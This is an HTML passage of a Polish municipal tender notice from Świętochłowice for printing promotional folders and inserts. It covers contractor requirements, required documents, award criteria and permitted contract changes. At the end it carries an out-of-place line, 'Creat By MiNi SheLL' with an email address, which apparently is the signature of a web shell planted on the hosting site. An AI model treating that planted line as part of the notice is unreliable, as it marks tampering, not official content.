</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej Wykonawca musi być  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 300.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenia oraz dokumenty wskazane  w rozdziale 6 specyfikacji, 
2. wypełniony formularz ofertowy  według załącznika nr 1,
W przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
3.oświadczenie o części zamówienia, której wykonanie, Wykonawca zamierza powierzyć podwykonawcom 
( w treści formularza ofertowego  pkt 4) w przypadku powierzenia przez Wykonawcę części zamówienia podwykonawcom,
5.pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy (dotyczy również wspólników spółki cywilnej),
6.pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania Wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub Wykonawca - w przypadku osób fizycznych.
7. dowód wniesienia wadium

Pełnomocnictwo, powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji 
wynika z dokumentu rejestracyjnego Wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do treści art. 144 ustawy  Zamawiający  przewiduje możliwość  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku 
a) zmiany ilości folderów promocyjnych - 15.000szt.  w sytuacji uzyskania zgody Instytucji Zarządzającej RPO WSL na wykonanie  mniejszej ilości  folderów promocyjnych,  z zastrzeżeniem, że nie mniej niż 1.500szt.
b) zmiany ilości wkładek do folderów - 75.000szt.  w sytuacji uzyskania zgody Instytucji Zarządzającej RPO WSL na wykonanie  mniejszej ilości  wkładek,  z zastrzeżeniem, że nie mniej niż 7.500szt.
c) zmiany wynagrodzenia za realizację zadania nr 1 w zakresie  wykonania mniejszej ilości  folderów promocyjnych oraz wkładek do folderów  w sytuacji uzyskania zgody Instytucji Zarządzającej RPO WSL na wykonanie  mniejszej ilości  folderów i wkładek do folderów.
d) zmiany terminu wykonania zamówienia pod warunkiem podpisania aneksu do umowy o dofinansowanie z Instytucją Zarządzającą  RPO WSL , zmieniającego zasady i terminy  realizacji przedmiotu zamówienia
e) zmiany wynagrodzenia w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT),  stosownie do obowiązującej stawki  podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Zamówień Publicznych   Urząd Miejski Świętochłowice ul. Katowicka 54  pok. 121.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2012 godzina 10:00, miejsce: Wydział  Zamówień Publicznych   Urząd Miejski Świętochłowice ul. Katowicka 54  pok. 121.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT współfinansowany ze środków Unii Europejskiej pn. Świętochłowice. Bliżej niż myślisz - Promocja terenów inwestycyjnych miasta realizowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Priorytet 1.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com